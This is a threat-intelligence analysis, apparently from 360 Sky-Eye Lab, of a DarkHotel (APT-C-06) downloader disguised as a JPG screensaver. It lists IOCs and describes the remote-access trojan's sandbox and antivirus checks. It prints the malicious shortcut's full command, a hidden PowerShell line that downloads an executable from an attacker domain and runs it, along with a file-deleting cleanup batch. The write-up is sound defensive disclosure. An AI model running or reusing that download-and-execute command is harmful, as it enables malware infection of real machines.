Author:360天眼實驗室
人在做,天在看。
360天眼實驗室追日團隊持續發現與跟蹤APT活動,相關的樣本、IP、域名等數據只要一出現就會立即進入我們的視線。5月10日VirusTotal上有人提交了一個樣本,安博士標記為DarkHotel相關。
DarkHotel團伙在2014年被卡巴斯基做過一次暴光,但直到最近還一直非常活躍,下面我們來對VT上的這個樣本做個簡單的分析。
樣本MD5:43f3b56c1c01b007c35197c703e4d6a6
樣本大小:131,072 Bytes
編譯時間:2015-10-15 22:52:30
文件名:DSC3013.JPG.scr
樣本截圖:
總體來說,樣本的功能很簡單,是一個典型的下載器誘餌。得到點擊運行機會以后,樣本會從自身釋放3個圖片和1個快捷方式到TEMP目錄下;調用mspaint打開3個圖片中的一個文件,執行TEMP目錄下的快捷方式,快捷方式運行起來后會啟動powershell從http://all-microsoft-control.com/kd/f.exe下載PE并執行。
樣本首先會獲取TEMP目錄的路徑:
然后拼出4個路徑:
%temp%\DSC3013.JPG
%temp%\DSC3014.JPG
%temp%\DSC3015.JPG
%temp%\desktop.lnk
會從自身文件的0x406b20的偏移處讀取0xead字節的數據寫入到DSC3013.JPG、DSC3014.JPG和DSC3015.JPG文件中;
數據為JPG圖片格式文件,如圖:
圖片是純白色背景的JPG文件,因為這種純色文件通過JPG格式的壓縮后占用的空間比較小。
數據同時寫入到剛才創建的3個隱藏的圖片文件中,CreateFile的倒數第二個參數為2,表示該文件是隱藏的狀態。
之后會調用mspaint.exe打開DSC3013.jpg文件,因為木馬樣本的文件名為DSC3013.JPG.scr,而且木馬樣本也是圖片圖標,所以用圖片打開DSC3013.jpg文件迷惑受害者:
接下來會在同目錄下再創建3個不隱藏的圖片文件,并寫入同樣的數據:
然后創建隱藏的desktop.lnk文件,把從文件的0x406088 處讀取到的數據寫入到該文件,并通過ShellExecute運行起來該快捷方式文件:
文件的0x406088偏移處是一個快捷方式格式的文件,如圖能看到快捷方式的參數信息:
把該塊數據段保存成LNK文件,命令行參數如下:
快捷方式指向的目標為:
%COMSPEC% /c powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://all-microsoft-control.com/kd/f.exe ','%temp%\~$ER96F.doc')&&echo f|xcopy %temp%\~$ER96F.doc %temp%\dwm.exe /H /Y&&%temp%\dwm.exe
所以快捷方式被執行起來后,會調用powershell從http://all-microsoft-control.com/kd/f.exe下載到%temp%\~$ER96F.doc,并把該文件重命名為dwm.exe后,運行起來。
最后會在同目錄下生成desktop.bat,并把“del *.scr\r\ndel *.bat”代碼寫入進去,試圖刪除掉該目錄下所有的scr和bat后綴的文件,讓目錄看起來只有正常的圖片文件。
目前通過URL下載的dwm.exe已經失效,但從360公司海量的樣本庫中找到了這個文件不難:
分析顯示此dwm.exe是一個使用OpenSSL協議的遠控木馬:
樣本的字符串加密存儲樣本里的,關鍵API都用解密后的字符串動態加載:.
sub_497036是字符串的解密函數:
樣本會檢測虛擬機、沙箱和殺軟:
卡巴
沙箱檢測:
檢測360的產品:
檢測金山和baidu的安全產品:
檢測通過后,會連接C&C地址的80端口,走SSL通信協議,把請求的數據包加密放到URL里,然后進行通信:
C&C域名為:view-drama-online.com
使用高級賬號查詢360威脅情報中心,樣本涉及的域名 all-microsoft-control.com 其實早就被內部分析團隊打上了相關的標簽,而外部的大部分威脅情報平臺對此域名沒有做什么惡意性標記:
域名注冊于2015年7月26日,在卡巴斯基在2014年的揭露報告以后注冊,由此可見APT團伙在被公開以后并不會停止活動,根據我們的分析甚至手法上都沒有大的改變。
雖然目前我們從那個域名已經下載不到 .EXE 的進一步惡意代碼,但威脅情報中心包含的同源樣本沙箱日志記錄告訴我們還有多個歷史下載路徑:
事實上,利用360威脅情報中心的基礎數據,從一個域名、樣本出發我們可以把DarkHotel團伙相關的很大一部分所使用的工具和網絡基礎設施信息關聯出來,在此基礎上分析其活動歷史,甚至最終定位到幕后的來源。
360公司內部的長期跟蹤了代號為APT-C-06的境外APT組織,其主要目標除了中國,還有其他國家,主要目的是竊取敏感數據信息,DarkHotel的活動可以視為APT-C-06組織一系列活動之一。在針對中國地區的攻擊中,該組織主要針對政府、科研領域進行攻擊,且非常專注于某特定領域,相關攻擊行動最早可以追溯到2007年,至今還非常活躍。
該組織多次利用0day漏洞發動攻擊,進一步使用的惡意代碼非常復雜,相關功能模塊達到數十種,涉及惡意代碼數量超過200個。該組織主要針對Windows系統進行攻擊,近期還會對基于Android系統的移動設備進行攻擊。另外該組織進行載荷投遞的方式除了傳統的魚叉郵件和水坑式攻擊等常見手法,還主要基于另一種特殊的攻擊手法。
我們將APT-C-06組織和其他APT組織的TTPs(戰術、技術與步驟)進行了對比分析,該組織無論是整體實力還是威脅等級在現有的APT組織中都是屬于很高的級別。從我們掌握的證據來看該組織有可能是由境外政府支持的黑客團體或情報機構。
| 類型 | 值 |
|---|---|
| Downloader Domain | all-microsoft-control.com |
| C&C Domain | view-drama-online.com |